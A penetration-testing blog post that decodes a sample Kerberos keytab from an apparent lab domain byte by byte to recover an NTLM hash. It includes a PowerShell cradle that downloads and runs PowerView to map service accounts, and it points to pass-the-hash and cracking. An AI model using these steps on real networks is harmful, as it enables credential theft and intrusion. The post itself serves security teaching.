Extracting NTLM Hashes from keytab files

Overview

If you’ve ever performed an engagement in a network that had some linux boxes in an Active Directory environment you have stumbled across keytab files. You may have thought nothing of them but in reality they’re a great resource for attackers because there’s a good chance they contain NTLM hashes. I have seen little resources on keytab files so I’ve decided to do a blog post to show how you can interpret them and potentially use them on an engagement should you come across them.

What Are Keytab files?

In short, keytab files allow linux boxes to authenticate to Kerberos. These files contain Kerberos Principals and keys, which are used to interact with Kerberos by requesting tickets. Many people may open a .keytab file and see what appears to be nonsense and think nothing of it, however these files are very sensitive and should be treated like you would a password or private key.

As you can tell, it doesn’t look like much. The structure of keytab files is documented [ HERE ]. Opening the file in a hex editor will make a bit more sense, and easier to work with.

Interpreting the Data

To make it easier to understand and parse, let’s open the file in Sublime Text and follow along with the documented file format to see how this file is structured.

Here I’ve broken the file into smaller chunks to represent the data structure as per the documentation.

0502– 16 bit value representing the keytab version (502 in this case)
0000 0047 – 32 bit value stating the number of bytes the keytab file is following these bits. Note that 47 is hexadecimal for 71 so there are 71 bytes following 0000 0047.
000c 736f 736c 6162 2e6c 6f63 616c – 16 bit value stating how many bytes that will follow (000c converts to 12 in decimal), followed by bytes that represent the realm. soslab.local is 12 bytes in this example.
0004 6874 7470– 16 bit value stating how many bytes are in the first portion of the principal (4 in this case), followed by the corresponding bytes (http in this example)
0012 7465 7374 312e 736f 736c 6162 2e6c 6f63 616c – 16 bit value stating how many bytes following it that are dedicated to the remaining portion of the principal. Again, the 0012 is in hexadecimal so the decimal value is 22. The remainder represents test1.soslab.local.
0000 0000– 32 bit value representing the bit type name (NT-UNKNOWN in this case).
0000 0000 – 32 bit value representing the timestamp
04 – 8 bit value representing the Version Number of the key.
0017– 16 bit value stating the Encryption type used (RC4-HMAC) in this case
0010 8955 1acf f889 5768 e489 bb30 54af 94fd– 16 bit value stating how many bytes will follow (0010 in hex converts to 16 in binary), followed by the NTLM hash.

Going On The Offensive

We’ve recovered an NTLM hash, which is great, but we don’t know what user to associate this hash with yet. What we do know, however, is the SPN associated with the hash. Utilizing PowerView, we can see the SPN’s for the domain with the following cradle iex (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Get-NetUser -SPN

The output shows is that the SPN is associated with a user named KeySrvc. With this knowledge we now have the ability to perform a number of different actions with the NTLM hash such as cracking it offline or performing pass-the-hash / overpass-the-hash attacks.

Python Script for Hash Extraction

Sifting through raw bytes is nobody’s idea of a good time, so I wrote a little script in Python3 to do the heavy lifting. You can find the repo [ HERE ]

Resources